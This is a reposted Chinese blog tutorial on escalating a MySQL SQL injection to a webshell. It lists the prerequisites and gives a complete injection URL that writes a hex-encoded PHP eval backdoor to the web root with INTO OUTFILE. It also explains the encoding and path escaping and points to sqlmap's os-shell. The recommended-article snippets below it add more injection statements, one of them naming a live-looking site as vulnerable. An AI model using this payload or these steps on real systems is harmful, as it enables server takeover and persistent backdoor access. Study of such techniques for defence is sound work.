【sql注入教程】mysql注入直接getshell

转载 2016年08月31日 11:24:26

Mysql注入直接getshell的条件相对来说比较苛刻点把

1:要知道网站绝对路径,可以通过报错,phpinfo界面,404界面等一些方式知道

2:gpc没有开启,开启了单引号被转义了,语句就不能正常执行了

3:要有file权限,默认情况下只有root

4:对目录要有写权限,一般image之类的存放突破的目录就有

在实际环境中我只遇过一次,为了做实验,我把php.ini文件里面的gpc改为了Off,重启了一下apahce服务

首先是常规的注入语句

And 1=1 and 1=2 之类的,在输入单引号的时候报错了得到了觉得路径,写shell需要用到

 

然后order by union

 

Mysql的注入语句可以参考这篇帖子http://bbs.ichunqiu.com/thread-5748-1-1.html

原创文章,希望大家多多支持

然后就是用into outfile写文件

http://127.0.0.1/mysqltest/index.php?age=25%20union%20select%201,2,3,4,0x3c3f706870206576616c28245f504f53545b2774657374275d293f3e%20into%20outfile%20%27C:/appserv/www/mysqltest/shell1.php%27

0x3c3f706870206576616c28245f504f53545b2774657374275d293f3ehex编码的<?php eval($_POST['test'])?>

 

写的文件名一定要是不存在的,不然就会不成功

这里的路径要用/,如果要用\的话,就要用\\ 转移成一个

C:\\appserv\\www\\mysqltest\\shell1.php

 

也可以直接用穿山甲来写

 

或者sqlmapos-shell

原创文章,希望大家多多支持我

文章中的实验源码下载地址http://bbs.ichunqiu.com/thread-5748-1-1.html

相关文章推荐

SQL注入系列之PHP+Mysql手动注入(一)----数字型

常见的几种SQL注入 1.数字型 2.字符型 3.文本型 4.搜索型(POST/GET) 5.cookie注入 6.SQL盲注 MySQL报错注入基本流程: Mysql注入步骤 1.判断sq...

mysql注入漏洞手注

mysql: 报错注入: 以http://www.hexie.com/main/articleDetail.php?id=757 为例子: http://www.hexie.com/main/arti...

一篇Mysql注入最全详解(2)

中国统计网 2017-05-23 22:05 一个数据库当中有很多的数据表,数据表当中有很多的列,每一列当中存储着数据。我们注入的过程就是先拿到数据库名,在获取到当前数据库名下的数据表,再获取当...

MySQL手工注入步骤+直接写入一句话

(1)判断注入点 通过浏览发现这个页面存在注入http://unisscan.cn/list.php?lei=246  这个是正常页面 加单引号出现异常http://unisscan.cn...

注入总结:mysql+mssql手工注入常用命令总结

欢迎使用Markdown编辑器写博客判断数据库类型: Access: and (select id from MSysAccessObjects) >0 返回正常说明是access MSSQL...

MySQL&nbsp;手工注入语句总结

sunzn:存查备用! 暴字段长度 Order by num/* 匹配字段 and 1=1 union select 1,2,3,4,5…….n/* 暴字段位置 and 1=2 union...

【转】MySql注入科普

转载自:http://ourmysql.com/archives/1244?f=wb 默认存在的数据库: mysql 需要root权限读取 inform...

MySQL防止SQL注入

SQL注入实例: $unsafe_variable = $_POST['user_input']; mysql_query("INSERT INTO `table` (`column`) VALU...

浅谈MySQL导出一句话木马拿WebShell的方法-只需要一句SQL

昨天看一篇文章中说到MySQL导出一句话木马拿WebShell的方法。   文章中用到的SQL语句大体如下(命令行或者其它能执行SQL命令的shell都行):   Drop TABLE IF EX...

DVWA之从SQL注入到写入webshell

转自:http://www.nxadmin.com/penetration/1141.html 这篇文章谈论简单的技术,利用sql注入(SQLi)漏洞,并获得一个webshell,所有的演示都是...
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:【sql注入教程】mysql注入直接getshell
举报原因:
原因补充:

(最多只允许输入30个字)